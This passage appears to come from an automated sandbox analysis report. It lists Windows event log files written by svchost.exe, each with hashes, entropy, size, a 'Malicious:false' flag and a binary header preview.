                            MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                            SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                            SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                            SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                            Malicious:false
                            Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.165454452307923
                            Encrypted:false
                            SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                            MD5:B6B6F199DA64422984403D7374F32528
                            SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                            SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                            SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                            Malicious:false
                            Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.8519554794255333
                            Encrypted:false
                            SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                            MD5:4140628CA3CEC29C0B506CEEBDF684F6
                            SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                            SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                            SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                            Malicious:false
                            Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.1642919553794224
                            Encrypted:false
                            SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                            MD5:D7EECF043241FDB9486580582E208603
                            SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                            SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                            SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                            Malicious:false
                            Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.576079103773187
                            Encrypted:false
                            SSDEEP:768:oQvIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbq:Vm+Jao7mce8p2
                            MD5:5096A411FC8DE7A2EFE92D23786E1D4C
                            SHA1:DA92531A9728B9F56DCF5148A2C40C92A9FD4758
                            SHA-256:617D84832BBDD349A4E2D0FC818A40AAF4C6F637149839DEBCB32E522D9D6AEC
                            SHA-512:37E6AD0C7429FBE8358803D723D827FD434005106171FC4008AFE45FECAD93997C0E26EED4C7B90A21E054C663463B720F6F169CF8263715041807AFCA33AD91
                            Malicious:false
                            Preview:ElfChnk.........................................."...9.Z....................................................................B.. ........................................4...=...........................................................................................................................f...............?...........................m...................M...F...........................................................U...................................................&...................................**..0...........|R...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.178629627614653
                            Encrypted:false
                            SSDEEP:384:shL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmLjUm:sY7Lu
                            MD5:FCEF23A3691F5D78A27C76D95B2F5ACA
                            SHA1:E3F120D9DB395881D78867302DB16507D5C80E6C
                            SHA-256:F0E54B18E4C12AF5DBBA107ACAF7F6DA974A72AF12B7AD22BB1AD9D9A6BAB2C7
                            SHA-512:63F56C9337D1DE757655594F51B967EC4D3F7CD2CF28E4F75AC3123A2B5B11A33B343B85EEE1BB7C1C6482EE0AEC91B5E7B72502F0E15310F86E810DEC155C67
                            Malicious:false
                            Preview:ElfChnk....................................../..(4....\.....................................................................G................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.2040196879846349
                            Encrypted:false
                            SSDEEP:48:MVW4XrP+MZQNRBEZWTENO4bpBkoDlgD/6FgVt:A5KNVaO80oZgD/6Fg
                            MD5:874B3F865EE985A801125E4649C849FE
                            SHA1:20E2318217B84C7180FB988DFD93F3F5943D9808
                            SHA-256:CAF7DB29DB1E6C58EC894D5242E0692BE134FF4845F12A0DC03BA439B34486A6
                            SHA-512:794C55E71C3570120620395E78E26729A6178F36588CF19B2CA976ADB7F100FB14E2318998EC4983FFA6D2EA92E6C9EBB54003AB7647DBE72DA34136A28B7106
                            Malicious:false
                            Preview:ElfChnk.............................................B........................................................................5.O................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............................&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.6469884746870727
                            Encrypted:false
                            SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                            MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                            SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                            SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                            SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                            Malicious:false
                            Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.4067373813600383
                            Encrypted:false
                            SSDEEP:768:hWa0NPaDaLaPa3ababafa3ananabaHaXarafa7ajaHajaTavaO6a3ajaPa7aXafC:KNH
                            MD5:C9086547BF5F9E822F359679E7F67F40
                            SHA1:2127B927EF9B279FC383FEE43C8B44E92864FF85
                            SHA-256:327257210F79945FB3AE7D54F04FC2BE85846177A9CEE0499AFC206F6DE5F944
                            SHA-512:887882FA560420B90E0D5214C5025BFB3BFF2D1B3670F4E4957CFA65531E2524F2E41E651B61AABCBCB89613038BF5AFEE0CBFF582EA520956172D1337C31D24
                            Malicious:false
                            Preview:ElfChnk.........@...............@...............`......s......................................................................h................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H.............0...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.3132453844344478
                            Encrypted:false
                            SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                            MD5:6237EE0458A0478242B975E9BB7AA97D
                            SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                            SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                            SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                            Malicious:false
                            Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.325262033408211
                            Encrypted:false
                            SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                            MD5:D13189B45679E53F5744A4D449F8B00F
                            SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                            SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                            SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                            Malicious:false
                            Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.7947046118743749
                            Encrypted:false
                            SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                            MD5:55E73A924B170FBFFF862E8E195E839A
                            SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                            SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                            SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                            Malicious:false
                            Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY
                            Category:dropped
                            Size (bytes):84544
                            Entropy (8bit):2.0943351215716235
                            Encrypted:false
                            SSDEEP:1536:YMpP9JcY6+g4+Ga67MpP9JcY6+g4+Ga6DMpP9JcY6+g4+Ga6F:YMpP9JcY6+g4+Ga67MpP9JcY6+g4+Gah
                            MD5:6B97F9A35583E15C3DC8274B3F0A7C72
                            SHA1:3EF206DEA358D780843CCAA28B9A40181546FB14
                            SHA-256:543F899BE6482935B952D0867AF10C6B064E23D934EF374AFD55DAA67B3A8155
                            SHA-512:A8212DFF9DFF9B6241868C752FF84024ED6A61A2767838AC1FA983C768F7DF2A38D7119850556AC3AC95D991024A2F5E1330779B6032C6CF0FFF627E7A48CBA5
                            Malicious:false
                            Preview:ElfFile.........................................................................................................................ElfChnk.....................................p ..."..x.......................................................................N{..................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................^...3...............................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):66560
                            Entropy (8bit):4.362194486499595
                            Encrypted:false
                            SSDEEP:384:1cRqxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRdO:1pxA8nPLGbMb
                            MD5:6AA5FD4D824EFD4448C04B35C094FF56
                            SHA1:B4EF0825ADCF4192C9F9E9E223077517D77E4BE5
                            SHA-256:E1440DDE27BCA23A2D29924AF202F43F54172C55AEF549E71F41DC08B532EDC8
                            SHA-512:E1378BB8FF3F6FBC56648CAD6168F59CB62AB01F42A6992F34D14C6B46D2498176E17F01C4DD63D15273491D38AF1A16791F014BB469F4292ABE8C9D1823C630
                            Malicious:false
                            Preview:ElfChnk............................................./I......................................................................+s.......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**...............S..1..........x68................................................................<.......T.....!................@.S..1...KK..A..K..U.8.w.....\........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......................N...W.M.I.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e.......%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.b.e.m.\.w.m.i.p

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.273338343434408
                            Encrypted:false
                            SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                            MD5:C37372EB51AEDB4552CB839C7294403A
                            SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                            SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                            SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                            Malicious:false
                            Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.231195890775603
                            Encrypted:false
                            SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                            MD5:3365A34953FD7B16667108A049B64DA5
                            SHA1:C72421A58E063D64072152344B266F8306A78702
                            SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                            SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                            Malicious:false
                            Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.350996099530715
                            Encrypted:false
                            SSDEEP:384:dh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwG:dOqabeGTnbuSxg6On
                            MD5:4A38F556B28847C79565F8F5B2E18529
                            SHA1:581498A0BC8A3EC2988AFE5C7FC0F60E14DF289A
                            SHA-256:E86ADB1001A17550D1F82D4B4136E5BD225EFC1D5456A36CE24E78834324A687
                            SHA-512:CE66231966337110F34D59C0E361E8859EE0B350AFFA40FAFAA47D58E105CD4D54F8ED8FA1B9A8F61E0C8F01CAA4CB364CDF58A9FC7BADDBF203EEE003F9F54F
                            Malicious:false
                            Preview:ElfChnk.....................................H...x....y......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.421206160086997
                            Encrypted:false
                            SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                            MD5:67CAD90771EBC0BD20736201D89C1586
                            SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                            SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                            SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                            Malicious:false
                            Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Security.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):69752
                            Entropy (8bit):4.432394242976953
                            Encrypted:false
                            SSDEEP:384:qqmooWsoIKo+xooWrooWlooWrooW2qsFRzBO2M7t5ZoqRMteoO1nRBocgTo+ryyM:iH+DemRngbe9R
                            MD5:EE8158B63D705FFF801B791B44016C44
                            SHA1:14CBFBAB6E6AA4DE6C3F4E286DBC7934D96742C3
                            SHA-256:87DE0FBF45D47322673770905464FB86C7D1858AB65BA73A33A12202AAC66BCE
                            SHA-512:0A13AE408DFCC92991F779E403B299BB3DC13E3728A78642768E21951EC5560E3DB4153500A11D32288963E4B227CB9BBC74297878FE857DB82B09F81AE8CBB1
                            Malicious:false
                            Preview:ElfChnk.........-.......U...........................N.k$.....................................................................2..................Z...s...h...................=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:....................$......C+..3...........................&...............................................>.......................s5..........**......{........@..1.............>...............................................................F.............!....6.......... ..@..1.........O........t.......{........M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B........................N...........................................$.N......j.o.n.e.s...J.O.N.E.S.-.P.C...}@......M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.a.b.h.q.h.y.z.r.h.m.n.q.b.t...........%.%.8

                            C:\Windows\System32\winevt\Logs\System.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.418013163886424
                            Encrypted:false
                            SSDEEP:384:ZFR0Gu1Bb9w+1a7I+OkYDcND+S/qDhqqOc0qgfARMR2RvHeJvGAgXZIpURCOLiju:zC/JVMjynLmLQXHmtpJnqiNHpzoQp
